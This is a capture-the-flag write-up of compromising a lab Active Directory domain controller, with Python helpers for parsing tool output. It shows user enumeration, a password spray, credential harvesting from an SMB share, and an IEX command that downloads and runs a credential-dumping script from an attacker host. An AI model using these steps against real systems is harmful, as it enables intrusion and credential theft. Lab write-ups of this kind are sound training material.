1. Reconnaissance
1.1. nmap reconnaissance
The scan shows 53 (DNS), 88 (Kerberos), 389/636 (LDAP/LDAPS) and 3268/3269 (Global Catalog) open, so the host is a domain controller for MEGABANK.LOCAL (the trailing "0." in nmap's "Domain: MEGABANK.LOCAL0." is an artifact of how nmap prints the domain field). There is no 80/443, so there is no web application to collect information from; the plan is to look for reachable shares and accounts instead. Two details in this output matter later: 5985 (WinRM over HTTP) is open, so any credential that lands in the Remote Management Users group gives a shell via evil-winrm, and SMB message signing is enabled and required, which rules out relaying NTLM to SMB on this host.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# nmap -sC -sV 10.129.228.111
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-20 11:28 +04
Nmap scan report for 10.129.228.111
Host is up (0.18s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-20 07:29:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-12-20T07:29:18
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -2s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.84 seconds
1.2. Account enumeration with rpcclient
A null session with rpcclient is accepted, and enumdomusers returns the domain's user list together with RIDs. Besides four personal accounts (mhope, dgalanos, roleary, smorgan) there are three svc-* accounts, SABatchJobs, and AAD_987d7f2f57d2. An AAD_<hex> account is what the Azure AD Connect installer creates for its sync service, a first hint that Azure AD Connect runs on this DC.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# rpcclient -U ""%"" 10.129.228.111
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
rpcclient $>
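The page never shows how the `users` file used later by GetNPUsers and nxc was produced from this output. The following is an added example (not part of the original writeup or of rpcclient) that parses the enumdomusers lines above into a username list and does a first triage by RID and naming pattern. The sample output is embedded so it runs offline; the "service account" name hints are an assumption for this example, not something the tool enforces.

```python
import re

# Constructed sample: the enumdomusers output from the rpcclient session above,
# embedded so the script runs offline (added example data, not a tool from the page).
ENUMDOMUSERS_OUTPUT = """\
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
"""

# One rpcclient line looks like:  user:[mhope] rid:[0x641]
_USER_LINE = re.compile(r"^user:\[(?P<name>[^\]]+)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]")


def parse_enumdomusers(text):
    """Return [(username, rid_as_int), ...] in the order rpcclient printed them.
    Lines that are not user entries (prompts, banners) are skipped."""
    users = []
    for line in text.splitlines():
        m = _USER_LINE.match(line.strip())
        if m:
            users.append((m.group("name"), int(m.group("rid"), 16)))
    return users


def users_file_text(users):
    """Usernames one per line: the format impacket-GetNPUsers -usersfile and nxc -u expect."""
    return "".join(name + "\n" for name, _ in users)


def write_users_file(users, path="users"):
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(users_file_text(users))


# Naming patterns that usually mark a non-human account (assumption for this example).
# AAD_<hex> is the account Azure AD Connect creates for its sync service.
_SERVICE_PREFIXES = ("svc", "aad_")


def triage(users):
    """Split accounts into built-ins (RID < 1000), probable service accounts, and people.
    Service accounts are the first candidates for username==password and Kerberoast checks."""
    builtin = [n for n, rid in users if rid < 1000]
    service = [n for n, rid in users
               if rid >= 1000 and (n.lower().startswith(_SERVICE_PREFIXES) or "batch" in n.lower())]
    people = [n for n, rid in users if rid >= 1000 and n not in service]
    return {"builtin": builtin, "service": service, "people": people}


if __name__ == "__main__":
    found = parse_enumdomusers(ENUMDOMUSERS_OUTPUT)
    write_users_file(found)          # writes ./users for the GetNPUsers / nxc steps
    for bucket, names in triage(found).items():
        print(f"{bucket}: {', '.join(names)}")
```

The RIDs are worth a glance on their own: Guest is the well-known RID 501, the svc-* accounts (0xa2b..0xa2d) and the personal accounts (0xa35..0xa37) were each created in one batch, and the AAD_ account sits between them.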
1.3. Failed reconnaissance
1.3.1. smbmap
smbmap with no credentials (a null session) gets access denied, so nothing is shared anonymously.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# smbmap -H 10.129.228.111
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 10.129.228.111, no fun for you...
[*] Closed 1 connections
1.3.2. smbclient
smbclient confirms it: the anonymous login (-N) is accepted but the share list comes back empty. The SMB1 "workgroup listing" error that follows is just smbclient's NetBIOS fallback failing because SMB1 is disabled on the target (nxc reports SMBv1:False later) and can be ignored.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# smbclient -N -L //10.129.228.111
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.228.111 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
1.4. Conclusion
All we have so far is the domain name and a list of usernames. As in the Sauna lab, the next step is AS-REP roasting with impacket's GetNPUsers: check whether any of these accounts has Kerberos pre-authentication disabled, in which case the KDC hands out an AS-REP that can be cracked offline.
2. Initial access
2.1. GetNPUsers - failed
None of the enumerated accounts has UF_DONT_REQUIRE_PREAUTH set, so no AS-REP hash can be requested. The users file is the enumdomusers list, one name per line. The KDC_ERR_CLIENT_REVOKED line at the top corresponds to the first entry, Guest, which the KDC reports as revoked (the usual response for a disabled account); it is not a pre-authentication result.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# impacket-GetNPUsers 'MEGABANK.LOCAL/' -usersfile users -format hashcat -outputfile hash -dc-ip 10.129.228.111
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set
2.2. Finding accounts whose password equals the username with nxc (SMB)
A very common finding is an account whose password is simply its username. Rather than test each one by hand, nxc is run with the same file as both the user list and the password list. Note what this command actually does: with -u users -p users nxc tries every user against every password in the file (10 x 10 = 100 logon attempts here, ten per account), and --continue-on-success keeps going after a hit instead of stopping at the first valid pair. On a lab box that is fine; against a real domain ten bad passwords per account will trip a typical lockout threshold, so check the password policy first (nxc smb ... --pass-pol) or use --no-bruteforce, which pairs line i of the user file with line i of the password file and therefore sends exactly one attempt per account. The result:
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# nxc smb 10.129.228.111 -u users -p users --continue-on-success
SMB 10.129.228.111 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
[...SNIP...]
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-ata:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-bexec:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-netapp:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\dgalanos:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\roleary:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\smorgan:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:SABatchJobs STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:SABatchJobs STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:SABatchJobs STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-ata:SABatchJobs STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-bexec:SABatchJobs STATUS_LOGON_FAILURE
[...SNIP...]
The output shows that SABatchJobs authenticates with SABatchJobs as its password.
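Two things a practitioner wants to check around this step: how many logon attempts the spray will actually generate per account (and whether that crosses a lockout threshold), and pulling the valid pairs out of nxc's output once it has run. The following is an added example written for this writeup, not nxc's own code; the lockout threshold is a parameter you fill in from --pass-pol, and the output sample is a constructed subset of the lines above.

```python
import itertools
import re

# Constructed sample: a handful of lines from the nxc run above (added example data).
NXC_OUTPUT = """\
SMB 10.129.228.111 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\\svc-ata:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\\mhope:SABatchJobs STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [+] MEGABANK.LOCAL\\SABatchJobs:SABatchJobs
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\\svc-bexec:SABatchJobs STATUS_LOGON_FAILURE
"""

# The users file built from enumdomusers.
USERS = ["Guest", "AAD_987d7f2f57d2", "mhope", "SABatchJobs", "svc-ata",
         "svc-bexec", "svc-netapp", "dgalanos", "roleary", "smorgan"]


def spray_pairs(users, passwords, pairwise):
    """The (user, password) attempts nxc will make.
    pairwise=False is the default `-u FILE -p FILE` behaviour: every user against every password.
    pairwise=True is `--no-bruteforce`: line i of the user file with line i of the password file."""
    if pairwise:
        return list(zip(users, passwords))
    return list(itertools.product(users, passwords))


def attempts_per_account(pairs):
    counts = {}
    for user, _ in pairs:
        counts[user] = counts.get(user, 0) + 1
    return counts


def accounts_at_lockout_risk(pairs, lockout_threshold):
    """Accounts that would receive at least `lockout_threshold` logon attempts in one run.
    Every attempt except the correct one adds to badPwdCount, so at the threshold the account locks.
    lockout_threshold 0 means the domain has no lockout policy."""
    if lockout_threshold == 0:
        return []
    return sorted(u for u, n in attempts_per_account(pairs).items() if n >= lockout_threshold)


# "[+] DOMAIN\\user:password" on success, "[-] DOMAIN\\user:password STATUS_..." on failure.
# Passwords containing whitespace would need a stricter parser; none occur here.
_RESULT = re.compile(
    r"\[(?P<status>[+-])\]\s+(?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<password>\S+)(?:\s+(?P<code>\S+))?")


def parse_nxc(output):
    """Split nxc SMB output into successful and failed (user, password) pairs."""
    hits, fails = [], []
    for line in output.splitlines():
        m = _RESULT.search(line)
        if not m:
            continue  # banner, [*] info lines, etc.
        cred = (m.group("user"), m.group("password"))
        (hits if m.group("status") == "+" else fails).append(cred)
    return hits, fails


if __name__ == "__main__":
    full = spray_pairs(USERS, USERS, pairwise=False)
    safe = spray_pairs(USERS, USERS, pairwise=True)
    print(f"default: {len(full)} attempts, locked at threshold 5: {accounts_at_lockout_risk(full, 5)}")
    print(f"--no-bruteforce: {len(safe)} attempts, locked at threshold 5: {accounts_at_lockout_risk(safe, 5)}")
    print("valid:", parse_nxc(NXC_OUTPUT)[0])
```

With the ten-user list, the default spray is 100 attempts and would lock every account under a threshold of 5; the pairwise form is 10 attempts and locks none, which is all the username==password check needs.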
2.3. Share enumeration with smbclient
2.3.1. evil-winrm test
With a credential in hand, evil-winrm was tried first to see whether it gives remote code execution. It fails with WinRMAuthorizationError: the account authenticates, but it is not allowed to use WinRM, since it is not in the Remote Management Users group (the group mhope turns out to be in later).
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# evil-winrm -i 10.129.228.111 -u SABatchJobs -p SABatchJobs
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
2.3.2. Listing shares with smbclient
The same credential lists the shares. Apart from the default administrative shares (ADMIN$, C$, E$, IPC$, NETLOGON, SYSVOL), two non-default ones stand out: azure_uploads and users$.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# smbclient -L \\10.129.228.111 -U SABatchJobs
Password for [WORKGROUP\SABatchJobs]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
azure_uploads Disk
C$ Disk Default share
E$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
users$ Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.228.111 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
2.4. Browsing the share
users$ looks like the home-directory share (net user later shows mhope's home directory as \\monteverde\users$\mhope), and per-user home directories are a classic place for stray credential files, so it is listed recursively. There is exactly one file: azure.xml under mhope.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# smbclient '//10.129.228.111/users$' -U SABatchJobs%SABatchJobs
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> ls
. D 0 Fri Jan 3 17:12:48 2020
.. D 0 Fri Jan 3 17:12:48 2020
dgalanos D 0 Fri Jan 3 17:12:30 2020
mhope D 0 Fri Jan 3 17:41:18 2020
roleary D 0 Fri Jan 3 17:10:30 2020
smorgan D 0 Fri Jan 3 17:10:24 2020
\dgalanos
. D 0 Fri Jan 3 17:12:30 2020
.. D 0 Fri Jan 3 17:12:30 2020
\mhope
. D 0 Fri Jan 3 17:41:18 2020
.. D 0 Fri Jan 3 17:41:18 2020
azure.xml AR 1212 Fri Jan 3 17:40:23 2020
\roleary
. D 0 Fri Jan 3 17:10:30 2020
.. D 0 Fri Jan 3 17:10:30 2020
\smorgan
. D 0 Fri Jan 3 17:10:24 2020
.. D 0 Fri Jan 3 17:10:24 2020
31999 blocks of size 4096. 28979 blocks available
smb: \>
2.5. Obtaining mhope's credentials
Download azure.xml and read it. It is PowerShell CLIXML (the Export-Clixml format: root element <Objs> in the powershell/2004/04 namespace) holding a serialized Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential object, i.e. an Azure AD application/service principal password credential that someone saved to disk, with the clear-text password in the <S N="Password"> element. The two garbage characters cat prints in front of <Objs> are a UTF-16 byte-order mark, the default encoding Windows PowerShell uses for Export-Clixml. As the next step shows, the same password was reused for mhope's domain account.
smb: \> cd mhope
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \mhope\> ^C
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# cat azure.xml
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
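Reading this by eye works for one file, but the same format shows up wherever Export-Clixml or Get-Credential | Export-Clixml has been used, and the UTF-16 encoding trips up grep and most XML tools. The following is an added example (not part of the writeup or of any Microsoft tooling) that decodes a CLIXML file by its BOM, walks the serialized objects, and reports any property that looks like a secret. The sample is the azure.xml above, re-encoded as UTF-16LE with a BOM on the assumption that this is how the original was written.

```python
import codecs
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"

# Constructed sample: the azure.xml content shown above (added example data). It is re-encoded
# below as UTF-16LE with a byte-order mark, the default Export-Clixml encoding in Windows
# PowerShell, which is what the two garbage characters `cat` printed in front of <Objs> were.
AZURE_XML_TEXT = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
"""
AZURE_XML_BYTES = codecs.BOM_UTF16_LE + AZURE_XML_TEXT.encode("utf-16-le")


def decode_clixml(raw):
    """Decode a CLIXML file by its BOM. Reading UTF-16 as UTF-8 gives NUL-riddled text that
    looks fine in a terminal but breaks XML parsing and makes grep miss most strings."""
    for bom, encoding in ((codecs.BOM_UTF8, "utf-8"),
                          (codecs.BOM_UTF16_LE, "utf-16-le"),
                          (codecs.BOM_UTF16_BE, "utf-16-be")):
        if raw.startswith(bom):
            return raw[len(bom):].decode(encoding)
    return raw.decode("utf-8")  # PowerShell 6+ writes UTF-8 without a BOM


def parse_clixml(raw):
    """Return one dict per serialized object: its .NET type names and its <Props> as name -> text.
    CLIXML has no <?xml ...?> declaration, so parsing the decoded str directly is safe."""
    root = ET.fromstring(decode_clixml(raw))
    objects = []
    for obj in root.iter(f"{{{PS_NS}}}Obj"):
        types = [t.text for t in obj.findall(f"{{{PS_NS}}}TN/{{{PS_NS}}}T")]
        props = {}
        props_el = obj.find(f"{{{PS_NS}}}Props")
        if props_el is not None:
            for child in props_el:       # <S>, <DT>, <G>, ... all carry the value as element text
                props[child.get("N")] = child.text
        objects.append({"types": types, "props": props})
    return objects


def find_secrets(objects):
    """(type, property, value) for every property whose name suggests a secret."""
    found = []
    for o in objects:
        for name, value in o["props"].items():
            if value and any(k in name.lower() for k in ("password", "secret")):
                found.append((o["types"][0] if o["types"] else None, name, value))
    return found


if __name__ == "__main__":
    for typ, prop, value in find_secrets(parse_clixml(AZURE_XML_BYTES)):
        print(f"{typ}.{prop} = {value}")
```

A PSCredential exported with Export-Clixml would instead carry a DPAPI-protected SecureString, only recoverable on the same machine and user, which is why a plain <S N="Password"> like this one is the jackpot.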
2.6. user.txt flag
Logging in with evil-winrm as mhope and the recovered password succeeds (mhope is in Remote Management Users, which is why WinRM works for this account and not for SABatchJobs), and user.txt is on the Desktop.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# evil-winrm -i 10.129.228.111 -u mhope -p 4n0therD4y@n0th3r$
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> type ../Desktop/user.txt
3. Privilege escalation
3.1. Checking mhope's privileges
First check the account's own privileges and its group memberships.
3.1.1. whoami /priv
*Evil-WinRM* PS C:\Users\mhope\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
3.1.2. whoami /groups
Among the groups, MEGABANK\Azure Admins stands out: it is not a default group, and together with the AAD_ account and the azure_uploads share it points at an Azure AD Connect installation on this DC.
*Evil-WinRM* PS C:\Users\mhope\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
3.1.3. net user mhope
net user confirms the Azure Admins membership and shows the home directory on the users$ share where azure.xml was found.
*Evil-WinRM* PS C:\Users\mhope\Documents> net user mhope
User name mhope
Full Name Mike Hope
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/2/2020 3:40:05 PM
Password expires Never
Password changeable 1/3/2020 3:40:05 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory \\monteverde\users$\mhope
Last logon 1/3/2020 5:29:59 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Azure Admins *Domain Users
The command completed successfully.
3.2. winPEAS - failed
As in the Sauna lab, winPEAS was tried next. The x64 build would not start:
*Evil-WinRM* PS C:\Users\mhope\Documents> .\winPEASx64.exe cmd fast > winPEASfast
Program 'winPEASx64.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1
+ .\winPEASx64.exe cmd fast > winPEASfast
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\winPEASx64.exe cmd fast > winPEASfast
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
The processor architecture is AMD64, so this is not an architecture mismatch, but the x64 binary still would not run and the cause was not investigated further.
*Evil-WinRM* PS C:\Users\mhope\Documents> $env:PROCESSOR_ARCHITECTURE
AMD64
The x86 build ran and produced the winPEASfast output file.
*Evil-WinRM* PS C:\Users\mhope\Documents> .\winPEASx86.exe cmd fast > winPEASfast
Searching it for password-related keywords found nothing useful. Note the -e l option on strings: Windows PowerShell's > redirection writes UTF-16LE, so strings has to be told to look for 16-bit little-endian characters or it finds almost nothing. What comes back is only section headers and policy field names, so winPEAS adds nothing beyond what whoami already showed.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# strings -e l winPEASfast | grep "Pass"
[1;32mEnumerating saved credentials in Registry (CurrentPass)
LimitBlankPasswordUse : 1
Password Last Set : 1/2/2020 2:18:38 PM
Password Last Set : 1/1/1970 12:00:00 AM
Password Last Set : 1/2/2020 2:06:03 PM
Password Last Set : 1/2/2020 2:53:24 PM
Password Last Set : 1/2/2020 3:40:05 PM
Password Last Set : 1/3/2020 4:48:46 AM
Password Last Set : 1/3/2020 4:58:31 AM
Password Last Set : 1/3/2020 4:59:55 AM
Password Last Set : 1/3/2020 5:01:42 AM
Password Last Set : 1/3/2020 5:06:10 AM
Password Last Set : 1/3/2020 5:08:05 AM
Password Last Set : 1/3/2020 5:09:21 AM
[1;32mPassword Policies
[1;37m MaxPasswordAge:
[1;37m MinPasswordAge:
[1;37m MinPasswordLength:
[1;37m PasswordHistoryLength:
[1;37m PasswordProperties:
[1;37m MaxPasswordAge:
[1;37m MinPasswordAge:
[1;37m MinPasswordLength:
[1;37m PasswordHistoryLength:
[1;37m PasswordProperties:
@umpass.inf,%UmPass.SVCDESC%;Microsoft UMPass Driver(@umpass.inf,%UmPass.SVCDESC%;Microsoft UMPass Driver)[
Google Password Sync? No
Disable Password Saving : True
[1;32mCached GPP Passwords
3.3. Azure AD Connect
Azure Admins membership, the AAD_987d7f2f57d2 account and the azure_uploads share all point to Azure AD Connect, the service that synchronises on-premises AD with Azure AD, being installed on this host. To synchronise (and in particular to run password hash sync) the service needs a privileged on-premises account, and it stores that connector account's credentials, encrypted, in its local ADSync database; an account that can read that database and load the service's encryption keys can decrypt them. Get-MSOLCredentials.ps1 is a public script that automates exactly this, and here mhope's Azure Admins membership is what grants that access. The script is served from the attacker host (10.10.14.143) and loaded straight into memory with IEX:
*Evil-WinRM* PS C:\Users\mhope\Documents> iex(new-object net.webclient).downloadstring('http://10.10.14.143/Get-MSOLCredentials.ps1')
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
One command, and the connector account turns out to be the domain Administrator itself. Even in a correctly configured deployment the connector account (normally an MSOL_* account) holds directory replication rights for password hash sync, so whoever can decrypt it effectively owns the domain; using the built-in Administrator only makes the last step shorter.
3.4. root flag
evil-winrm with the recovered Administrator credentials gives a shell, and root.txt is on the Administrator Desktop.
┌──(root㉿kali)-[/home/kali/labs/Monteverde/Monteverde-2]
└─# evil-winrm -i 10.129.228.111 -u administrator -p d0m@in4dminyeah!
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt